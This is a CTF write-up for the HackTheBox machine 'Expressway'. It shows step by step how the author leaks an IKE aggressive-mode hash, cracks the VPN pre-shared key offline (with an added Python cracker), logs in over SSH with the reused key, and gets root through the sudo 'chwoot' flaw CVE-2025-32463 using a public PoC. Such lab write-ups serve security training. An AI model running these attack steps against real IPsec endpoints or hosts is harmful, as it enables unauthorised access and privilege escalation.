Expressway – HackTheBox

  • OS: Linux
  • Difficulty: Easy
  • Platform: HackTheBox



Summary

“Expressway” is an Easy box on the HackTheBox platform. The victim machine exposes an Internet Key Exchange (IKE) service on UDP/500. Because the service accepts IKEv1 Aggressive Mode with pre-shared-key authentication, anyone who starts a handshake receives the responder's identity and a hash derived from the PSK, which we crack offline with a wordlist; the recovered PSK turns out to be reused as the SSH password of the user named in that identity. Once in, we find an outdated sudo that is vulnerable to CVE-2025-32463 (“chwoot”), which lets us escalate privileges and become root.


User

We start with a quick Nmap scan looking for open TCP ports:

❯ sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 10.129.190.74

We only find one open port, 22 (SSH). Running version and script scans against it gives:

❯ sudo nmap -sVC -p22 10.129.190.74

Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 17:50 -03
Nmap scan report for 10.129.190.74
Host is up (0.29s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.77 seconds

We can then look for open UDP ports with Nmap, where we get:

❯ sudo nmap -sU --top-ports 100 --open 10.129.190.74

Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 17:53 -03
Nmap scan report for 10.129.190.74
Host is up (0.28s latency).
Not shown: 95 closed udp ports (port-unreach)
PORT      STATE         SERVICE
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
500/udp   open          isakmp
4500/udp  open|filtered nat-t-ike
32771/udp open|filtered sometimes-rpc6

Nmap done: 1 IP address (1 host up) scanned in 111.99 seconds

We can see an Internet Key Exchange (IKE) service running on port 500.

Info
IKE, or Internet Key Exchange, is the protocol used to automatically set up secure communication channels, particularly for IPsec VPNs. It functions as the initial “handshake” between two devices: authenticating them, agreeing on security parameters such as encryption algorithms and keys, and establishing a secure tunnel for the subsequent data transfer. Essentially, IKE manages the exchange of cryptographic keys and sets up the security associations (SAs) that give the exchanged data confidentiality, integrity and authenticity.

Running version and script scans against this port gives:

❯ sudo nmap -sUVC -p500 10.129.190.74

Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 17:57 -03
Nmap scan report for 10.129.190.74
Host is up (0.27s latency).

PORT    STATE SERVICE VERSION
500/udp open  isakmp?
| ike-version:
|   attributes:
|     XAUTH
|_    Dead Peer Detection v1.0

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.26 seconds

This only tells us that the peer advertises XAUTH and Dead Peer Detection; it does not give us much more to go on.

However, this blog provides more information about pentesting the IKE service. It mentions a tool called ike-scan, available from its GitHub repository, which can also be installed with apt:

sudo apt update -y && sudo apt install ike-scan -y

To use ike-scan effectively, another blog post explains how to extract information from an IKE service. It suggests running:

ike-scan -M -A <target-ip>

Here -M (--multiline) only splits the decoded payloads across several lines for readability, and -A (--aggressive) makes ike-scan use IKE Aggressive Mode instead of the default Main Mode.

As the blog notes, if Aggressive Mode with pre-shared-key authentication is enabled, the responder sends its identity (the group name or user ID) and its HASH_R value in the clear, before the initiator has proven it knows the PSK. That hash can be attacked offline with a dictionary, so an exposed aggressive-mode endpoint leaks a crackable fingerprint of the PSK to anyone who can reach UDP/500.

Running it we get:

❯ ike-scan -M -A 10.129.190.74

Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.190.74   Aggressive Mode Handshake returned
        HDR=(CKY-R=44f674a34584fdd0)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.306 seconds (3.27 hosts/sec).  1 returned handshake; 0 returned notify

The response Aggressive Mode Handshake returned confirms that aggressive mode is accepted, with 3DES/SHA1 and PSK authentication. The ID payload carries ike@expressway.htb, so ike is a likely username on the host.

Continuing with the blog, it also suggests a command to dump the handshake parameters needed for PSK cracking:

❯ ike-scan -A --pskcrack 10.129.190.74

Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.190.74   Aggressive Mode Handshake returned HDR=(CKY-R=3925813ea86f1ba7) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
d7dea145886a64157bcea81201db6e357124f0cc43007f24cede8b93d04bbe9835eeff29531ab65e7923e8ba006638bbaad01f06f5246e1c4f32ceff6d1425c15bc1f84eccda2249b45576c52103fb156ae090f69ba6d19e72674c22d6f2f31ba1b9473a80e33068195de44db9d2e8325b29576108cd7a59fe4e89397a9c58b3:84825ec0748782e3c898e9f69bf8b233b3a433dd03f8906b40a7c8d36a74ea6f97cecc9c9f30626ff25126ec5755b107bc71dabc35a0330bdf58d1ffc4b57cadcea73f61161165208ec22e365994af151bc00a45c48edf85c59a802d5cfb47a11f56f0948d1994ec28a113d61b6809dfe2d3656406a3b30406083972c0948eca:3925813ea86f1ba7:7d39e52c6b3e64b4:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:73866765000a5f6dc0f149f55d50617608e7eed2:bb4deb493422896dbac2bf7847e0455237709bd03ce0af9930336562f79cbd5c:2f7c31efdf9c20e0b7840f6bed1fa28cde9caf02
Ending ike-scan 1.9.6: 1 hosts scanned in 0.279 seconds (3.58 hosts/sec).  1 returned handshake; 0 returned notify

What looks like one big hash is in fact nine colon-separated hex fields (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r): both Diffie-Hellman public values, both ISAKMP cookies, the SA proposal body, the responder's ID payload, both nonces and, last, the responder's HASH_R. Everything that went into HASH_R except the PSK itself is in this line, which is exactly what makes an offline dictionary attack possible.

Save this line into a file:

❯ echo d7dea145886a64157bcea81201db6e357124f0cc43007f24cede8b93d04bbe9835eeff29531ab65e7923e8ba006638bbaad01f06f5246e1c4f32ceff6d1425c15bc1f84eccda2249b45576c52103fb156ae090f69ba6d19e72674c22d6f2f31ba1b9473a80e33068195de44db9d2e8325b29576108cd7a59fe4e89397a9c58b3:84825ec0748782e3c898e9f69bf8b233b3a433dd03f8906b40a7c8d36a74ea6f97cecc9c9f30626ff25126ec5755b107bc71dabc35a0330bdf58d1ffc4b57cadcea73f61161165208ec22e365994af151bc00a45c48edf85c59a802d5cfb47a11f56f0948d1994ec28a113d61b6809dfe2d3656406a3b30406083972c0948eca:3925813ea86f1ba7:7d39e52c6b3e64b4:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:73866765000a5f6dc0f149f55d50617608e7eed2:bb4deb493422896dbac2bf7847e0455237709bd03ce0af9930336562f79cbd5c:2f7c31efdf9c20e0b7840f6bed1fa28cde9caf02 > ike_hash

Then, as the blog suggests, use psk-crack (shipped with ike-scan) to crack it, passing rockyou.txt as the dictionary:

❯ psk-crack -d /usr/share/wordlists/rockyou.txt ike_hash

Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 2f7c31efdf9c20e0b7840f6bed1fa28cde9caf02
Ending psk-crack: 8045040 iterations in 12.596 seconds (638715.04 iterations/sec)

The PSK is freakingrockstarontheroad. Note that psk-crack went through about 8 million candidates in 12.6 seconds, so any PSK that appears in a common wordlist falls almost immediately.
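To make explicit what psk-crack does with that line (the "what is this hash" question above and the cracking step), here is an added Python reimplementation written for this write-up; it is not part of ike-scan. It parses the nine fields, recomputes HASH_R for each candidate pre-shared key exactly as RFC 2409 defines it for PSK authentication, and stops at a match. The handshake parameters are the ones dumped from the target above; the short candidate list is constructed for the example and stands in for rockyou.txt.

```python
import hmac
from typing import Dict, Iterable, Optional

# Field order of one ike-scan --pskcrack record.
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")

# The record dumped from the target above, split into chunks only for readability.
PSK_PARAMS = ":".join([
    # g_xr: responder DH public value (modp1024 -> 128 bytes)
    "d7dea145886a64157bcea81201db6e357124f0cc43007f24cede8b93d04bbe98"
    "35eeff29531ab65e7923e8ba006638bbaad01f06f5246e1c4f32ceff6d1425c1"
    "5bc1f84eccda2249b45576c52103fb156ae090f69ba6d19e72674c22d6f2f31b"
    "a1b9473a80e33068195de44db9d2e8325b29576108cd7a59fe4e89397a9c58b3",
    # g_xi: initiator (ike-scan) DH public value
    "84825ec0748782e3c898e9f69bf8b233b3a433dd03f8906b40a7c8d36a74ea6f"
    "97cecc9c9f30626ff25126ec5755b107bc71dabc35a0330bdf58d1ffc4b57cad"
    "cea73f61161165208ec22e365994af151bc00a45c48edf85c59a802d5cfb47a1"
    "1f56f0948d1994ec28a113d61b6809dfe2d3656406a3b30406083972c0948eca",
    "3925813ea86f1ba7",  # cky_r: responder cookie
    "7d39e52c6b3e64b4",  # cky_i: initiator cookie
    # sai_b: body of the SA payload the initiator offered (four transforms)
    "0000000100000001000000980101000403000024010100008001000580020002"
    "8003000180040002800b0001000c000400007080030000240201000080010005"
    "800200018003000180040002800b0001000c0004000070800300002403010000"
    "80010001800200028003000180040002800b0001000c00040000708000000024"
    "0401000080010001800200018003000180040002800b0001000c000400007080",
    "03000000696b6540657870726573737761792e687462",  # idir_b: ID_USER_FQDN ike@expressway.htb
    "73866765000a5f6dc0f149f55d50617608e7eed2",  # ni_b: initiator nonce
    "bb4deb493422896dbac2bf7847e0455237709bd03ce0af9930336562f79cbd5c",  # nr_b: responder nonce
    "2f7c31efdf9c20e0b7840f6bed1fa28cde9caf02",  # hash_r: the value we try to reproduce
])


def parse_pskcrack_line(line: str) -> Dict[str, bytes]:
    """Split one ike-scan --pskcrack record into raw bytes per field."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return {name: bytes.fromhex(value) for name, value in zip(FIELDS, parts)}


def hash_algorithm(params: Dict[str, bytes]) -> str:
    """The negotiated prf follows from the HASH_R length: 16 bytes -> HMAC-MD5, 20 -> HMAC-SHA1."""
    return {16: "md5", 20: "sha1"}[len(params["hash_r"])]


def compute_hash_r(params: Dict[str, bytes], psk: bytes) -> bytes:
    """RFC 2409 section 5.4, pre-shared key authentication:
         SKEYID = prf(PSK, Ni_b | Nr_b)
         HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    The responder sends HASH_R before the initiator has proven anything,
    which is why this can be recomputed offline for any guessed PSK."""
    algo = hash_algorithm(params)
    skeyid = hmac.new(psk, params["ni_b"] + params["nr_b"], algo).digest()
    data = (params["g_xr"] + params["g_xi"] + params["cky_r"] + params["cky_i"]
            + params["sai_b"] + params["idir_b"])
    return hmac.new(skeyid, data, algo).digest()


def crack_psk(params: Dict[str, bytes], candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose recomputed HASH_R equals the captured one, else None."""
    target = params["hash_r"]
    for word in candidates:
        if hmac.compare_digest(compute_hash_r(params, word.encode()), target):
            return word
    return None


def responder_identity(params: Dict[str, bytes]) -> str:
    """IDir_b = ID type (1 byte) + protocol (1) + port (2) followed by the identity data."""
    return params["idir_b"][4:].decode("ascii", errors="replace")


if __name__ == "__main__":
    p = parse_pskcrack_line(PSK_PARAMS)
    print("responder ID:", responder_identity(p))
    # Constructed mini-wordlist standing in for rockyou.txt.
    print("PSK:", crack_psk(p, ["password", "expressway", "freakingrockstarontheroad"]))
```

The whole attack costs two HMACs per candidate, which is why psk-crack reaches hundreds of thousands of guesses per second on one core; the only defence on the VPN side is a PSK that is not in any wordlist, or not offering Aggressive Mode with PSK at all.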

Finally, we check whether this PSK is reused as the SSH password of the user ike found earlier, using NetExec:

❯ nxc ssh 10.129.190.74 -u ike -p 'freakingrockstarontheroad'

SSH         10.129.190.74   22     10.129.190.74    [*] SSH-2.0-OpenSSH_10.0p2 Debian-8
SSH         10.129.190.74   22     10.129.190.74    [+] ike:freakingrockstarontheroad  Linux - Shell access!

It works: the VPN pre-shared key doubles as ike's SSH password.

Connect as this user using SSH service:

❯ sshpass -p 'freakingrockstarontheroad' ssh -o stricthostkeychecking=no ike@10.129.190.74

<SNIP>
Last login: Sat Sep 20 22:28:27 2025 from 10.10.16.80
ike@expressway:~$

We can grab the user flag.


Root

If we check sudo version we get:

ike@expressway:~$ sudo -V

Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

Some time ago an advisory was published for a local privilege escalation in sudo, CVE-2025-32463 (“chwoot”): sudo 1.9.14 through 1.9.17, the versions that support the -R/--chroot option, let an unprivileged user load attacker-controlled NSS libraries as root via a chroot of their choosing; the fix shipped in 1.9.17p1. Searching for PoCs for this vulnerability we find this GitHub repository, which also provides a command to check whether the target is vulnerable:

ike@expressway:~$ sudo -R woot woot

sudo: woot: No such file or directory

The message sudo: woot: No such file or directory shows that this sudo build accepts the -R option and tries to use the chroot directory before the sudoers policy has rejected the command, which is the behaviour the exploit relies on. Together with the version 1.9.17 (older than the 1.9.17p1 fix), the target is vulnerable.
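As an added helper written for this write-up (it is not from the PoC repository), the following Python encodes the affected range so that sudo -V output can be classified mechanically, including the pN patch-level suffix that a naive string comparison gets wrong (1.9.17p1 is fixed, 1.9.17 is not). The embedded sudo -V text is the target's output from above.

```python
import re
from typing import Tuple

# The sudo -V output captured on the target above; only the first line is needed.
SUDO_V_OUTPUT = """Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
"""

Version = Tuple[int, int, int, int]  # (major, minor, patch, patch-level "pN", 0 if absent)

# CVE-2025-32463: the -R/--chroot option appeared in 1.9.14 and the fix shipped
# in 1.9.17p1, so the affected set is 1.9.14 <= version < 1.9.17p1.
CHWOOT_INTRODUCED: Version = (1, 9, 14, 0)
CHWOOT_FIXED: Version = (1, 9, 17, 1)


def parse_sudo_version(text: str) -> Version:
    """Extract the sudo front-end version from `sudo -V` output.

    '1.9.17' -> (1, 9, 17, 0); '1.9.15p5' -> (1, 9, 15, 5).
    """
    m = re.search(r"^Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text, re.MULTILINE)
    if not m:
        raise ValueError("no 'Sudo version X.Y.Z' line found")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def chwoot_affected(version: Version) -> bool:
    """True when the version lies inside the CVE-2025-32463 affected range."""
    return CHWOOT_INTRODUCED <= version < CHWOOT_FIXED


def format_version(version: Version) -> str:
    """Render a tuple back in sudo's own notation, e.g. (1, 9, 17, 1) -> '1.9.17p1'."""
    major, minor, patch, plevel = version
    return f"{major}.{minor}.{patch}" + (f"p{plevel}" if plevel else "")


if __name__ == "__main__":
    v = parse_sudo_version(SUDO_V_OUTPUT)
    verdict = "AFFECTED by CVE-2025-32463" if chwoot_affected(v) else "not affected"
    print(f"sudo {format_version(v)}: {verdict}")
```

Distribution packages sometimes backport the fix without bumping the version, so treat a positive result here as a reason to run the `sudo -R` probe above rather than as proof on its own.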

We clone the repository on our attacker machine and copy the exploit script to the victim with scp (we already have SSH access):

❯ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git -q

❯ cd CVE-2025-32463_chwoot

❯ sshpass -p 'freakingrockstarontheroad' scp ./sudo-chwoot.sh ike@10.129.190.74:/tmp/sudo-chwoot.sh

Then, on the victim machine, make the exploit executable and run it:

ike@expressway:~$ chmod +x /tmp/sudo-chwoot.sh

ike@expressway:~$ /tmp/sudo-chwoot.sh
woot!

root@expressway:/# whoami
root

GG. We can grab the root flag in the /root directory.

~Happy Hacking